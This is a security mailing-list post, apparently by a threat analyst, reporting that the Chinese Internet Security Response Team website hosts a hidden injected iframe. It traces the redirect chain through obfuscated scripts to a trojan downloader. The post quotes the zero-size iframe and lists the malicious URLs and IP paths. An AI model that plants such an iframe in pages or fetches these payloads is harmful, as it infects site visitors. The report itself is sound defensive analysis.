RE: Chinese Internet Security Response Team Website Hosting Malicious Cont ent

[<Ivan_Macalintal () trendmicro com>]

Yep... CISRT is still VERY MUCH hosting malicious content. 
More info on the Trend Malware Blog...

I've checked three pages:

http:// www. cisrt.org/enblog/read.php?172 
(This is the same link being shown in tech news sites like TheRegister -
these guys should be advised to remove this link from their write-ups.
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

They still have this IFRAME on the top of the page:

<iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0
frameborder=0></iframe> 

http:// mms.nmmmn.com/99916.htm loads oo.js and ax.htm which is full of
more obfuscated scripts and at least one IFRAME to http://
5x.3x7x.cn/t.htm

The file t.htm has another IFRAME to http:// 60.191.247.178/aaa1.htm
which in turn has these IFRAME links:

http:// 60.191.247.178/Webxl.htm
http:// 60.191.247.178/wm/wm2.htm
http:// 60.191.247.178/wm/vip.htm
http:// 60.191.247.178/wm/wm4.htm
http:// 60.191.247.178/wm/wm5.htm

And a script at:

http:// js.users.51.la/1023960.js

Where a couple of obfuscated JS'es are also downloaded and executed
from:

http:// 60.191.247.178/wm/nick.js
http:// 60.191.247.178/wm/nick2.js

They ultimately download and install http:// mms.nmmmn.com/sms.exe which
is a trojan downloader downloading around 20 more binaries...

Regards,

Ivan Macalintal
Senior Threat Analyst
Trend Micro Inc.



TREND MICRO EMAIL NOTICE
The information contained in this email and any attachments is confidential and may be subject to copyright or other 
intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this 
information, and we request that you notify us by reply mail or telephone and delete the original message from your 
mail system.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.